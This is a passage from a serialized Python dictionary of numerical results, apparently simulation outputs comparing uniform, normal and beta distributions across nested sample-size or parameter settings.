0.3480710820539448, 'nor': 0.4373869135130795, 'beta1': 0.34733880445619963, 'beta2': 0.5217846583202729, 'beta4': 0.29138608643267194}, 75: {'uni': 0.344012344807911, 'nor': 0.4023970962232527, 'beta1': 0.3495418301470877, 'beta2': 0.48385297839039, 'beta4': 0.30746632172742533}, 50: {'uni': 0.3456741024510142, 'nor': 0.387583403531333, 'beta1': 0.3450764110863124, 'beta2': 0.42792581205635305, 'beta4': 0.31493852332853506}, 30: {'uni': 0.34757461968534475, 'nor': 0.3660480324362303, 'beta1': 0.3430535156174783, 'beta2': 0.39516737178821565, 'beta4': 0.3266792953043453}, 20: {'uni': 0.34332496479157215, 'nor': 0.37016864522498233, 'beta1': 0.3438921835770231, 'beta2': 0.3780257022382943, 'beta4': 0.332826430774212}, 10: {'uni': 0.3432638175430853, 'nor': 0.34656732461796685, 'beta1': 0.34530041961548025, 'beta2': 0.3621336740217708, 'beta4': 0.33301573335144213}}, 200: {1000: {'uni': 0.35397577006236064, 'nor': 1.6880107688499668, 'beta1': 0.3509512766017229, 'beta2': 2.5472310916904464, 'beta4': 0.17937070455079063}, 750: {'uni': 0.3534492950521917, 'nor': 1.3462174364691601, 'beta1': 0.34252933428118637, 'beta2': 1.9997138016373859, 'beta4': 0.18808720501818546}, 500: {'uni': 0.3414087298618831, 'nor': 1.003233841927636, 'beta1': 0.3453809732427485, 'beta2': 1.4542100041390176, 'beta4': 0.2028182073608281}, 400: {'uni': 0.3458951879188956, 'nor': 0.8685866682805892, 'beta1': 0.34743230253372726, 'beta2': 1.332099610483853, 'beta4': 0.20908071122056882}, 300: {'uni': 0.3471664547886561, 'nor': 0.727794381484671, 'beta1': 0.35076929096112525, 'beta2': 1.0434269108804657, 'beta4': 0.22423365788256022}, 200: {'uni': 0.34413238821258607, 'nor': 0.6147359660914746, 'beta1': 0.35089981074426324, 'beta2': 0.8099260333831554, 'beta4': 0.24358797686705402}, 150: {'uni': 0.339936102320085, 'nor': 0.55221617457234, 'beta1': 0.34616688013398644, 'beta2': 0.7051079677507086, 'beta4': 0.2505100139108426}, 100: {'uni': 0.3446261265431087, 'nor': 0.4792836523502122, 'beta1': 
0.35142451365868926, 'beta2': 0.5858619038731584, 'beta4': 0.2751043217476785}, 75: {'uni': 0.3478642666164821, 'nor': 0.45888115676348, 'beta1': 0.3486583947927791, 'beta2': 0.5164284462675127, 'beta4': 0.28845638479831875}, 50: {'uni': 0.34103513391692986, 'nor': 0.41208649872391234, 'beta1': 0.344884394694451, 'beta2': 0.45971215774307156, 'beta4': 0.29938022874279796}, 30: {'uni': 0.3481030712621901, 'nor': 0.3894583006944668, 'beta1': 0.34717964633738396, 'beta2': 0.4096578744766348, 'beta4': 0.3197560171684093}, 20: {'uni': 0.33983037641029334, 'nor': 0.37505954789145096, 'beta1': 0.3487484160639571, 'beta2': 0.38550515120020684, 'beta4': 0.32511678116663717}, 10: {'uni': 0.34648485570776455, 'nor': 0.36054087791292677, 'beta1': 0.3457880198406115, 'beta2': 0.36093745693627277, 'beta4': 0.33750493584405156}}, 150: {1000: {'uni': 0.35855679355645487, 'nor': 2.137814211516231, 'beta1': 0.3505282691209241, 'beta2': 2.9019884065488495, 'beta4': 0.17157691794475752}, 750: {'uni': 0.3520800612264919, 'nor': 1.7021693510463247, 'beta1': 0.3511398978439243, 'beta2': 2.269796020841365, 'beta4': 0.17947834909802796}, 500: {'uni': 0.35011570165384504, 'nor': 1.2462148272826032, 'beta1': 0.34610681903199625, 'beta2': 1.7552755586485762, 'beta4': 0.19119731999075687}, 400: {'uni': 0.3456329512316953, 'nor': 1.0590359965214562, 'beta1': 0.35014065898105695, 'beta2': 1.4313410427332007, 'beta4': 0.19623036838033153}, 300: {'uni': 0.34527118758550485, 'nor': 0.8812749025718438, 'beta1': 0.34944394458697825, 'beta2': 1.1588075057993832, 'beta4': 0.20771969576432014}, 200: {'uni': 0.3489738989982756, 'nor': 0.7014599135166738, 'beta1': 0.34830333644666117, 'beta2': 0.915340546836583, 'beta4': 0.2263531728160868}, 150: {'uni': 0.3429228048276349, 'nor': 0.6165824034990142, 'beta1': 0.34343683973228967, 'beta2': 0.7566890470098447, 'beta4': 0.24382109386295112}, 100: {'uni': 0.3425285186465402, 'nor': 0.5317499572943216, 'beta1': 0.3454943851918104, 'beta2': 0.6240602607130921, 
'beta4': 0.26276196224188025}, 75: {'uni': 0.3473550254909798, 'nor': 0.4781796971737509, 'beta1': 0.3493724223269961, 'beta2': 0.5591888563697984, 'beta4': 0.27778273801276504}, 50: {'uni': 0.3428279297727261, 'nor': 0.43535250166487094, 'beta1': 0.3442214225564261, 'beta2': 0.479908838662072, 'beta4': 0.2937106328128505}, 30: {'uni': 0.3418794080578704, 'nor': 0.40103316462979616, 'beta1': 0.3499534241478493, 'beta2': 0.4227810467699822, 'beta4': 0.3102985640146892}, 20: {'uni': 0.34811502141065576, 'nor': 0.38549582915429814, 'beta1': 0.3441463547925956, 'beta2': 0.39277202188140015, 'beta4': 0.3187336459718889}, 10: {'uni': 0.34330862403529744, 'nor': 0.36346435616006495, 'beta1': 0.3469201841472034, 'beta2': 0.3581487076523773, 'beta4': 0.3327277447628047}}, 100: {1000: {'uni': 0.3722831918742666, 'nor': 3.0381615766629624, 'beta1': 0.3487812436005163, 'beta2': 3.4056411541631597, 'beta4': 0.16687909663377307}, 750: {'uni': 0.36086762860351934, 'nor': 2.3794615987237338, 'beta1': 0.351189585306215, 'beta2': 2.5949293863952536, 'beta4': 0.1709871528017898}, 500: {'uni': 0.349805023733788, 'nor': 1.7056246948939178, 'beta1': 0.3475762510915695, 'beta2': 1.9018134806788765, 'beta4': 0.17969632659255938}, 400: {'uni': 0.3490677824745589, 'nor': 1.3999121462123332, 'beta1': 0.3507443961701372, 'beta2': 1.6095123649369334, 'beta4': 0.18579332318138084}, 300: {'uni': 0.34879085377563823, 'nor': 1.1658197529948917, 'beta1': 0.34774454661138066, 'beta2': 1.3183855664195328, 'beta4': 0.19580380328549032}, 200: {'uni': 0.34331340368316626, 'nor': 0.8793367098901197, 'beta1': 0.3449855343207457, 'beta2': 1.0296524804053566, 'beta4': 0.21178290032007802}, 150: {'uni': 0.34134065052350926, 'nor': 0.7550776311919849, 'beta1': 0.3438476193999038, 'beta2': 0.8356367089354535, 'beta4': 0.2243814426924324}, 100: {'uni': 0.34494961517463724, 'nor': 0.6074739448155042, 'beta1': 0.350538922675542, 'beta2': 0.6833257829663539, 'beta4': 0.2435075875469618}, 75: {'uni': 
0.34823909271266096, 'nor': 0.5506586574743351, 'beta1': 0.3450886289873298, 'beta2': 0.5985491404272344, 'beta4': 0.2562367198191135}, 50: {'uni': 0.3445907688697594, 'nor': 0.4892029171428822, 'beta1': 0.351685420248068, 'beta2': 0.50463513631763, 'beta4': 0.2721121885598124}, 30: {'uni': 0.34380387455691164, 'nor': 0.42482766423752505, 'beta1': 0.3517093374868383, 'beta2': 0.433137251893754, 'beta4': 0.29889400163605306}, 20: {'uni': 0.34761787684419804, 'nor': 0.40063690078106884, 'beta1': 0.34569487097161505, 'beta2': 0.4043324689835272, 'beta4': 0.3099384406707861}, 10: {'uni': 0.3368231032278602, 'nor': 0.37414139322084167, 'beta1': 0.34526172651145914, 'beta2': 0.3768152424104807, 'beta4': 0.3258793776432392}}, 75: {1000: {'uni': 0.38032079371458866, 'nor': 3.893179411720956, 'beta1': 0.33895197976916025, 'beta2': 3.665817783885145, 'beta4': 0.16221681570587448}, 750: {'uni': 0.3774896680042954, 'nor': 3.041307612796793, 'beta1': 0.3531047623969306, 'beta2': 2.9177298137115932, 'beta4': 0.16760701259293861}, 500: {'uni': 0.3691603809627662, 'nor': 2.1136522720926076, 'beta1': 0.3506731318868911, 'beta2': 2.0800219389279033, 'beta4': 0.17237248115050258}, 400: {'uni': 0.3542804938614184, 'nor': 1.7635783367478515, 'beta1': 0.3480209110363151, 'beta2': 1.753279431906443, 'beta4': 0.17877015455578205}, 300: {'uni': 0.3530910129911514, 'nor': 1.40824257505653, 'beta1': 0.3468992232652649, 'beta2': 1.4286138146048428, 'beta4': 0.18618258284509892}, 200: {'uni': 0.35404448422917234, 'nor': 1.0871523518236694, 'beta1': 0.34676310798083787, 'beta2': 1.0969581653639313, 'beta4': 0.19917988881180035}, 150: {'uni': 0.3471357147047061, 'nor': 0.8860821820154345, 'beta1': 0.34219905448064564, 'beta2': 0.9223710573153442, 'beta4': 0.21007320251501296}, 100: {'uni': 0.3473811058881694, 'nor': 0.715183149921106, 'beta1': 0.34386435910210156, 'beta2': 0.7290266843292309, 'beta4': 0.2302230863314267}, 75: {'uni': 0.34480847684480825, 'nor': 0.6128517103087979, 'beta1': 
0.3490544903490166, 'beta2': 0.6210256341169503, 'beta4': 0.23928023154694925}, 50: {'uni': 0.3519634286283122, 'nor': 0.535269531408463, 'beta1': 0.3485012701192417, 'beta2': 0.529307351668824, 'beta4': 0.26177269899069644}, 30: {'uni': 0.34761067896637265, 'nor': 0.460593353930858, 'beta1': 0.3460459195016941, 'beta2': 0.4519827169452344, 'beta4': 0.289949655149545}, 20: {'uni': 0.3468412967012832, 'nor': 0.42130771837669, 'beta1': 0.34702385398283925, 'beta2': 0.42403711754723916, 'beta4': 0.3001880754924463}, 10: {'uni': 0.3395056585563256, 'nor': 0.38398628388024797, 'beta1': 0.34266048288383505, 'beta2': 0.37609257537094914, 'beta4': 0.32389503113475765}}, 50: {1000: {'uni': 0.4347386296621316, 'nor': 5.903113283717573, 'beta1': 0.3458499082519396, 'beta2': 4.56059131081475, 'beta4': 0.16177924865526983}, 750: {'uni': 0.4080484429773817, 'nor': 4.462441182886646, 'beta1': 0.3448072378752806, 'beta2': 3.627354125296263, 'beta4': 0.16521179391821397}, 500: {'uni': 0.3852363552796836, 'nor': 3.0766708652850117, 'beta1': 0.3474481187838615, 'beta2': 2.544804667262524, 'beta4': 0.16604306303156843}, 400: {'uni': 0.38227668686292127, 'nor': 2.548974709246717, 'beta1': 0.3564344226224531, 'beta2': 2.1034143877988716, 'beta4': 0.16997498457387009}, 300: {'uni': 0.36482493041269376, 'nor': 1.9887184654132837, 'beta1': 0.34800510793556466, 'beta2': 1.6526246501307664, 'beta4': 0.17253160277881177}, 200: {'uni': 0.36337018580466046, 'nor': 1.4457332170143293, 'beta1': 0.3510141513992577, 'beta2': 1.2763395931108832, 'beta4': 0.18462120515319508}, 150: {'uni': 0.35577904314930736, 'nor': 1.1558700394945114, 'beta1': 0.34949146441961493, 'beta2': 1.0592480702192182, 'beta4': 0.19561796749180563}, 100: {'uni': 0.3477172098075887, 'nor': 0.9073729769528663, 'beta1': 0.3450185824743941, 'beta2': 0.8094515457094794, 'beta4': 0.2071546414569944}, 75: {'uni': 0.34125034122921394, 'nor': 0.7547201637839731, 'beta1': 0.3456874754796907, 'beta2': 0.7017239279026216, 'beta4': 
0.21922659978150177}, 50: {'uni': 0.33880945045029826, 'nor': 0.6079205186753285, 'beta1': 0.3543737005717827, 'beta2': 0.5816117115186251, 'beta4': 0.24353668852069424}, 30: {'uni': 0.3431007994484497, 'nor': 0.515581573279696, 'beta1': 0.346492905581158, 'beta2': 0.4727465341515703, 'beta4': 0.2707420287422262}, 20: {'uni': 0.33540476537955854, 'nor': 0.45520516780061937, 'beta1': 0.3406042857634804, 'beta2': 0.42569063054856937, 'beta4': 0.2864332225489485}, 10: {'uni': 0.34219260815428754, 'nor': 0.4030004368028241, 'beta1': 0.3424555787270816, 'beta2': 0.3895108454898639, 'beta4': 0.3134271440491817}}, 30: {1000: {'uni': 0.5912672207776604, 'nor': 9.527258371560922, 'beta1': 0.36358902818996824, 'beta2': 6.0474393748944255, 'beta4': 0.1566183550644414}, 750: {'uni': 0.5205276415999436, 'nor': 7.1846290287913535, 'beta1': 0.36042655724639866, 'beta2': 4.721207847858767, 'beta4': 0.15817695286915404}, 500: {'uni': 0.458945074914611, 'nor': 4.9438685876332675, 'beta1': 0.3512022799112701, 'beta2': 3.277870745954269, 'beta4': 0.16010949046042697}, 400: {'uni': 0.4392171770850031, 'nor': 4.040052462527793, 'beta1': 0.34937995162981234, 'beta2': 2.685259178691964, 'beta4': 0.16469616287949998}, 300: {'uni': 0.4042998393631235, 'nor': 3.1228108633451424, 'beta1': 0.35391590930846445, 'beta2': 2.0726334265315987, 'beta4': 0.16673640336372708}, 200: {'uni': 0.387238644411021, 'nor': 2.1704115878479118, 'beta1': 0.34614994776463975, 'beta2': 1.5341779941768152, 'beta4': 0.17262425762789227}, 150: {'uni': 0.3718021016553037, 'nor': 1.6935285337198958, 'beta1': 0.345108376430461, 'beta2': 1.2073441904012723, 'beta4': 0.1762258439064716}, 100: {'uni': 0.3584866807874342, 'nor': 1.2538009391466625, 'beta1': 0.3450931333761505, 'beta2': 0.9488607884476075, 'beta4': 0.18927407539036956}, 75: {'uni': 0.35116467381518124, 'nor': 1.0239932402161527, 'beta1': 0.3464071359362087, 'beta2': 0.8024377076076704, 'beta4': 0.20216287361165863}, 50: {'uni': 0.34245713359424695, 'nor': 
0.811421429036936, 'beta1': 0.3488815710989564, 'beta2': 0.638751193692387, 'beta4': 0.2176599981779147}, 30: {'uni': 0.34903831332483576, 'nor': 0.6147648924540778, 'beta1': 0.3440196877298809, 'beta2': 0.515506440973083, 'beta4': 0.24016190092594067}, 20: {'uni': 0.33737476805183686, 'nor': 0.5309803958803571, 'beta1': 0.34097608432305376, 'beta2': 0.4582370367023497, 'beta4': 0.26284911332188543}, 10: {'uni': 0.33781041301044673, 'nor': 0.4419972892631432, 'beta1': 0.34437991388723727, 'beta2': 0.3942969069743231, 'beta4': 0.2865988298916934}}, 20: {1000: {'uni': 0.8965909515980386, 'nor': 14.43160261621047, 'beta1': 0.40879724910349813, 'beta2': 7.703097044523489, 'beta4': 0.15777136298750422}, 750: {'uni': 0.7465181212742386, 'nor': 10.80135778166109, 'beta1': 0.38921094677035356, 'beta2': 5.9974942469122325, 'beta4': 0.15998239385661403}, 500: {'uni': 0.6088672984749545, 'nor': 7.304689028033914, 'beta1': 0.373771541626272, 'beta2': 4.027137560010544, 'beta4': 0.16163415741805556}, 400: {'uni': 0.5512936057820512, 'nor': 5.956240612141846, 'beta1': 0.3697285679426312, 'beta2': 3.335922157039538, 'beta4': 0.1611260117755855}, 300: {'uni': 0.49676954291719955, 'nor': 4.58931566065136, 'beta1': 0.35950999134779804, 'beta2': 2.583167677932982, 'beta4': 0.1622195846063796}, 200: {'uni': 0.43568253433790133, 'nor': 3.1173720871603443, 'beta1': 0.3464265148706499, 'beta2': 1.8079860961396275, 'beta4': 0.16758797337107686}, 150: {'uni': 0.4046165586714504, 'nor': 2.4195703053430293, 'beta1': 0.3531443387784461, 'beta2': 1.4753331116985116, 'beta4': 0.16965491542778036}, 100: {'uni': 0.3762742643740686, 'nor': 1.765288822689759, 'beta1': 0.3524276940513375, 'beta2': 1.0841173374160238, 'beta4': 0.17845587683466202}, 75: {'uni': 0.36218638835697453, 'nor': 1.3876888573033577, 'beta1': 0.3503939829222516, 'beta2': 0.8954861247858222, 'beta4': 0.1877690214122453}, 50: {'uni': 0.3521418775849935, 'nor': 1.0414912127014189, 'beta1': 0.34022528133363233, 'beta2': 
0.7054403223889628, 'beta4': 0.20028939322658593}, 30: {'uni': 0.3426909931385447, 'nor': 0.7675040513769444, 'beta1': 0.34053541174088253, 'beta2': 0.5503420280923643, 'beta4': 0.2215057999895056}, 20: {'uni': 0.3363305461705004, 'nor': 0.6255214087625113, 'beta1': 0.33491632393555937, 'beta2': 0.46832505580377143, 'beta4': 0.24284505128556536}, 10: {'uni': 0.33518761864677465, 'nor': 0.4931184293561005, 'beta1': 0.3391485976534156, 'beta2': 0.39630521127982427, 'beta4': 0.27139530895291425}}, 10: {1000: {'uni': 2.3874340797968814, 'nor': 29.663480850360397, 'beta1': 0.9169229003489705, 'beta2': 12.20925559858758, 'beta4': 0.1564888636547848}, 750: {'uni': 1.8615157681014205, 'nor': 21.801968499676818, 'beta1': 0.7473940671291324, 'beta2': 9.267094002909307, 'beta4': 0.1561349717825088}, 500: {'uni': 1.3134854154935922, 'nor': 15.249137564401448, 'beta1': 0.5934628187469416, 'beta2': 6.175670299414178, 'beta4': 0.1576162013654804}, 400: {'uni': 1.1145075409375296, 'nor': 11.974411479422269, 'beta1': 0.5301830934992371, 'beta2': 5.140934047559648, 'beta4': 0.15897679114618293}, 300: {'uni': 0.9078215986658665, 'nor': 8.868858736093818, 'beta1': 0.4850422676075548, 'beta2': 3.8520697501497536, 'beta4': 0.15601309502687813}, 200: {'uni': 0.7081080566694192, 'nor': 6.227802150964231, 'beta1': 0.4280233051488676, 'beta2': 2.6977738374144065, 'beta4': 0.16111656347952902}, 150: {'uni': 0.6007454684465097, 'nor': 4.710059470113114, 'beta1': 0.3990084689677828, 'beta2': 2.0564056256518675, 'beta4': 0.1627500664646643}, 100: {'uni': 0.49761742864535224, 'nor': 3.250988568599194, 'beta1': 0.3737337332326855, 'beta2': 1.4561033940469712, 'beta4': 0.1665861437159576}, 75: {'uni': 0.4503391470649682, 'nor': 2.5306944092179675, 'beta1': 0.36124674699535686, 'beta2': 1.1922233929028405, 'beta4': 0.16676211842199312}, 50: {'uni': 0.40116564754189815, 'nor': 1.8282171177299855, 'beta1': 0.35304130396901157, 'beta2': 0.8794730305256969, 'beta4': 0.17737449940003902}, 30: {'uni': 
0.35980970739758494, 'nor': 1.222640887186312, 'beta1': 0.3400081965549426, 'beta2': 0.6511660921260646, 'beta4': 0.18895070743803286}, 20: {'uni': 0.34682134148512966, 'nor': 0.9477562627590225, 'beta1': 0.33450338225464055, 'beta2': 0.538055747077308, 'beta4': 0.2062208052648477}, 10: {'uni': 0.3311807215098405, 'nor': 0.6394074548870496, 'beta1': 0.3301935234529011, 'beta2': 0.41808098738012345, 'beta4': 0.239050783112545}}}, 0.2: {1000: {1000: {'uni': 0.24124725799461827, 'nor': 0.4053264452318229, 'beta1': 0.23914293982059717, 'beta2': 1.0509959984580306, 'beta4': 0.17568080256625232}, 750: {'uni': 0.24164388268120782, 'nor': 0.3687830499658719, 'beta1': 0.243028138607501, 'beta2': 0.784731460864333, 'beta4': 0.18815121077723373}, 500: {'uni': 0.24326842966163004, 'nor': 0.32463820180526554, 'beta1': 0.24310356844769024, 'beta2': 0.560609377317712, 'beta4': 0.19960017726532056}, 400: {'uni': 0.23902795484816924, 'nor': 0.3125538120607967, 'beta1': 0.24223057995297714, 'beta2': 0.4770053150772008, 'beta4': 0.20309690339198788}, 300: {'uni': 0.23869851303079107, 'nor': 0.2917904746847079, 'beta1': 0.23805489672369276, 'beta2': 0.4061962989224635, 'beta4': 0.21148616699287323}, 200: {'uni': 0.24368185962341393, 'nor': 0.279239353863688, 'beta1': 0.24329991362449854, 'beta2': 0.3464015419031672, 'beta4': 0.21701422300653347}, 150: {'uni': 0.23805417073622206, 'nor': 0.2648108143069742, 'beta1': 0.24112587613874334, 'beta2': 0.3169793434410238, 'beta4': 0.22625899182567927}, 100: {'uni': 0.24112468954747324, 'nor': 0.2555534679342511, 'beta1': 0.24391216254475265, 'beta2': 0.2811465587345888, 'beta4': 0.22615912967234958}, 75: {'uni': 0.2377789796740822, 'nor': 0.2502177301730839, 'beta1': 0.23897299843042535, 'beta2': 0.27291284924753667, 'beta4': 0.23102167971177617}, 50: {'uni': 0.2420481229386659, 'nor': 0.2483541709202484, 'beta1': 0.2395019750658544, 'beta2': 0.26178626368274266, 'beta4': 0.2378697343455223}, 30: {'uni': 0.23839523280714542, 'nor': 
0.2448261144336522, 'beta1': 0.24297869273136183, 'beta2': 0.2549842966602735, 'beta4': 0.2344566138825933}, 20: {'uni': 0.24294085836130722, 'nor': 0.2459984385174377, 'beta1': 0.2409977912230283, 'beta2': 0.24836430873811524, 'beta4': 0.24236541724974348}, 10: {'uni': 0.23996750948003354, 'nor': 0.24319752879898954, 'beta1': 0.24061748766076452, 'beta2': 0.24848114887420777, 'beta4': 0.23742872285699368}}, 750: {1000: {'uni': 0.24213602459464384, 'nor': 0.4668947186186115, 'beta1': 0.2400298002859102, 'beta2': 1.0537929179775296, 'beta4': 0.16960490699279673}, 750: {'uni': 0.24252558303608956, 'nor': 0.40252237715680944, 'beta1': 0.24007629950163753, 'beta2': 0.7880701340760959, 'beta4': 0.17806957712390817}, 500: {'uni': 0.24364703012383299, 'nor': 0.34998153650454966, 'beta1': 0.24139971779624214, 'beta2': 0.5617828287616604, 'beta4': 0.1912425902387635}, 400: {'uni': 0.24147766494729744, 'nor': 0.33073040328340325, 'beta1': 0.23886051231633573, 'beta2': 0.4821271764245669, 'beta4': 0.19650526443681385}, 300: {'uni': 0.24537594610132082, 'nor': 0.30608768980075746, 'beta1': 0.23858930631150674, 'beta2': 0.41147281542567865, 'beta4': 0.20502061090216653}, 200: {'uni': 0.24268617663557088, 'nor': 0.2891942420581909, 'beta1': 0.24104096550685916, 'beta2': 0.3549441465252581, 'beta4': 0.21514022394369312}, 150: {'uni': 0.24034254831699772, 'nor': 0.2725893818027367, 'beta1': 0.23968652814412453, 'beta2': 0.32196628110834, 'beta4': 0.22158539656940412}, 100: {'uni': 0.24066960454670216, 'nor': 0.26072438431981576, 'beta1': 0.23860999283751405, 'beta2': 0.295308268894434, 'beta4': 0.22468320403577302}, 75: {'uni': 0.2372348854433789, 'nor': 0.2577253003131136, 'beta1': 0.23904507681739837, 'beta2': 0.2808413650663696, 'beta4': 0.22998494050062063}, 50: {'uni': 0.24162659968427913, 'nor': 0.25234746676918207, 'beta1': 0.24423303357816123, 'beta2': 0.26517888856634686, 'beta4': 0.23259076555479863}, 30: {'uni': 0.24026106701043032, 'nor': 0.24910214073724177, 'beta1': 
0.2405253750459323, 'beta2': 0.2551649499009466, 'beta4': 0.2365634356538571}, 20: {'uni': 0.24267815059641026, 'nor': 0.245298372253819, 'beta1': 0.24080870936687, 'beta2': 0.2552267059461294, 'beta4': 0.24100356768933173}, 10: {'uni': 0.24456210577096196, 'nor': 0.24477627325344592, 'beta1': 0.24555026833090088, 'beta2': 0.242950667829395, 'beta4': 0.24155735139737788}}, 500: {1000: {'uni': 0.24164987087115197, 'nor': 0.5721918782884466, 'beta1': 0.23996298637023378, 'beta2': 1.1779948690165256, 'beta4': 0.15428354475510184}, 750: {'uni': 0.24159673038840507, 'nor': 0.4918971663930825, 'beta1': 0.24120994313020436, 'beta2': 0.8803516369213815, 'beta4': 0.16565776898213674}, 500: {'uni': 0.23991550021580707, 'nor': 0.4101489076635629, 'beta1': 0.23929053512796192, 'beta2': 0.6491947662249905, 'beta4': 0.17883673195668998}, 400: {'uni': 0.24251723206941572, 'nor': 0.36960634216527005, 'beta1': 0.24277119423256865, 'beta2': 0.5505149369922498, 'beta4': 0.18419162201388328}, 300: {'uni': 0.24179003293271845, 'nor': 0.33510396603618053, 'beta1': 0.24003491428852153, 'beta2': 0.4621704086743315, 'beta4': 0.19345184620978545}, 200: {'uni': 0.24008858690578336, 'nor': 0.30561704025672465, 'beta1': 0.2411289063793809, 'beta2': 0.38799140893024225, 'beta4': 0.20430036700083373}, 150: {'uni': 0.2402127113334836, 'nor': 0.29359145762455585, 'beta1': 0.24097953145287435, 'beta2': 0.35422332515291893, 'beta4': 0.21168379467345955}, 100: {'uni': 0.24266553946279426, 'nor': 0.2764289867601266, 'beta1': 0.23940472376646318, 'beta2': 0.3109340118793721, 'beta4': 0.22327921524434563}, 75: {'uni': 0.24228255563926224, 'nor': 0.2684971154591404, 'beta1': 0.24478704183107347, 'beta2': 0.2904293862430301, 'beta4': 0.2222914607306522}, 50: {'uni': 0.24336271099583262, 'nor': 0.2573476188536372, 'beta1': 0.23890548191925962, 'beta2': 0.2784552417268729, 'beta4': 0.22861542581896685}, 30: {'uni': 0.24204605571751606, 'nor': 0.25108561658127865, 'beta1': 0.24555355114900856, 'beta2': 
0.2627389376158154, 'beta4': 0.23170001504553606}, 20: {'uni': 0.24073537437234863, 'nor': 0.2470271721892606, 'beta1': 0.2464463166884145, 'beta2': 0.25549256236330153, 'beta4': 0.24037869393451103}, 10: {'uni': 0.24247329417887659, 'nor': 0.2441965770243582, 'beta1': 0.24103184940811473, 'beta2': 0.2520935857785229, 'beta4': 0.23862365558069581}}, 400: {1000: {'uni': 0.24211427327472068, 'nor': 0.676319267340814, 'beta1': 0.24108390834726123, 'beta2': 1.1690252804190693, 'beta4': 0.15078182161253156}, 750: {'uni': 0.24267791300187727, 'nor': 0.5501413249911372, 'beta1': 0.242775031630821, 'beta2': 0.897697338268199, 'beta4': 0.15869834269819497}, 500: {'uni': 0.24145820022964667, 'nor': 0.4521520593828404, 'beta1': 0.2418804659547599, 'beta2': 0.6550622764615105, 'beta4': 0.16977219676395533}, 400: {'uni': 0.23821559225819358, 'nor': 0.4102458629344209, 'beta1': 0.23743320963502837, 'beta2': 0.5687082029198804, 'beta4': 0.17623787502407762}, 300: {'uni': 0.23986191363478224, 'nor': 0.36396123975400607, 'beta1': 0.24081073282914195, 'beta2': 0.4752804571225306, 'beta4': 0.18821500754467457}, 200: {'uni': 0.24029454257379748, 'nor': 0.3223034871436207, 'beta1': 0.2399555016919217, 'beta2': 0.41519656419281536, 'beta4': 0.19773039648651466}, 150: {'uni': 0.24112635756275794, 'nor': 0.3034935016307265, 'beta1': 0.2435734602722558, 'beta2': 0.36533428802282, 'beta4': 0.20514348419020711}, 100: {'uni': 0.23780523639691478, 'nor': 0.2831084401784451, 'beta1': 0.23747175043173488, 'beta2': 0.31735429345053373, 'beta4': 0.21660212309631313}, 75: {'uni': 0.2418157552287163, 'nor': 0.26979755399473915, 'beta1': 0.24058627879036779, 'beta2': 0.3005365712461821, 'beta4': 0.21980198569077422}, 50: {'uni': 0.24415674401788423, 'nor': 0.25836745432753955, 'beta1': 0.23928001830324636, 'beta2': 0.27485770957941486, 'beta4': 0.22835111909074343}, 30: {'uni': 0.24609118802801827, 'nor': 0.2534347434770235, 'beta1': 0.23925830272224197, 'beta2': 0.2638635206820125, 'beta4': 
0.22976503900007766}, 20: {'uni': 0.23922321624939863, 'nor': 0.24850008485696506, 'beta1': 0.24063011653162658, 'beta2': 0.2552606058417734, 'beta4': 0.23485042539952278}, 10: {'uni': 0.24240830716178507, 'nor': 0.24239798495104373, 'beta1': 0.23901416919802654, 'beta2': 0.252340339870926, 'beta4': 0.23662410365477324}}, 300: {1000: {'uni': 0.243053898871161, 'nor': 0.8232114454294339, 'beta1': 0.24213327571940335, 'beta2': 1.2649793578697028, 'beta4': 0.1434865846334235}, 750: {'uni': 0.24277697138409443, 'nor': 0.671128181328664, 'beta1': 0.2382122025024967, 'beta2': 0.9610201013925472, 'beta4': 0.15099442381409264}, 500: {'uni': 0.2415441903390995, 'nor': 0.5239011024630138, 'beta1': 0.24085249976123604, 'beta2': 0.7160923462546679, 'beta4': 0.16032455575028098}, 400: {'uni': 0.24090473568312606, 'nor': 0.4589917188298054, 'beta1': 0.2401089340456763, 'beta2': 0.6134753236562074, 'beta4': 0.16832475453109194}, 300: {'uni': 0.24176994785336725, 'nor': 0.4131159780152836, 'beta1': 0.23737268022389493, 'beta2': 0.5633941361756649, 'beta4': 0.17658015943691016}, 200: {'uni': 0.23828816545809994, 'nor': 0.3487354251401745, 'beta1': 0.2429355648970097, 'beta2': 0.43986284067280296, 'beta4': 0.190705297281293}, 150: {'uni': 0.24255538533158844, 'nor': 0.32509313749389934, 'beta1': 0.2389950310201909, 'beta2': 0.38991759246533064, 'beta4': 0.19629155163725026}, 100: {'uni': 0.24095331519349314, 'nor': 0.2963437976654876, 'beta1': 0.23965188272123855, 'beta2': 0.33545367591531955, 'beta4': 0.21099104990350545}, 75: {'uni': 0.24221950168410636, 'nor': 0.28546070154906056, 'beta1': 0.2429247640798027, 'beta2': 0.3160255362155384, 'beta4': 0.21049215049193679}, 50: {'uni': 0.24069007546929116, 'nor': 0.26907721641204213, 'beta1': 0.24312415693432637, 'beta2': 0.2909340446638638, 'beta4': 0.22154246200364566}, 30: {'uni': 0.23923154893167575, 'nor': 0.2622736680244658, 'beta1': 0.2400516003722522, 'beta2': 0.2665968226643333, 'beta4': 0.2323366436504289}, 20: {'uni': 
0.24138941949164475, 'nor': 0.2551655584694042, 'beta1': 0.24213498137771242, 'beta2': 0.2584842482144281, 'beta4': 0.23566993903051417}, 10: {'uni': 0.2432209669937062, 'nor': 0.25283907350595836, 'beta1': 0.2431742501646928, 'beta2': 0.25078409064276774, 'beta4': 0.23529627943263173}}, 200: {1000: {'uni': 0.24499660366604434, 'nor': 1.097639817869575, 'beta1': 0.23911455181052824, 'beta2': 1.4649285026997207, 'beta4': 0.1359651395598983}, 750: {'uni': 0.24199851808800438, 'nor': 0.887824725825296, 'beta1': 0.2413967087754142, 'beta2': 1.1334345439634328, 'beta4': 0.14047516993915654}, 500: {'uni': 0.24014075287593903, 'nor': 0.6594000341543945, 'beta1': 0.24036435405117293, 'beta2': 0.8216125007394981, 'beta4': 0.14849218268167758}, 400: {'uni': 0.24106960987934098, 'nor': 0.5689946627658751, 'beta1': 0.24110128297972788, 'beta2': 0.771591571279977, 'beta4': 0.1543868467871832}, 300: {'uni': 0.23882273709350196, 'nor': 0.4942731879466135, 'beta1': 0.24011478876050937, 'beta2': 0.6245393310482865, 'beta4': 0.16399101088173093}, 200: {'uni': 0.24033816531081775, 'nor': 0.4032448186638761, 'beta1': 0.2399443452121945, 'beta2': 0.49293684523390047, 'beta4': 0.17527446161393567}, 150: {'uni': 0.2428018327342402, 'nor': 0.3669217193782184, 'beta1': 0.24180877006068127, 'beta2': 0.43756548053840366, 'beta4': 0.18593075843293286}, 100: {'uni': 0.24262619876046118, 'nor': 0.3259239792998355, 'beta1': 0.24152719536498482, 'beta2': 0.3596422376502065, 'beta4': 0.19880936168442362}, 75: {'uni': 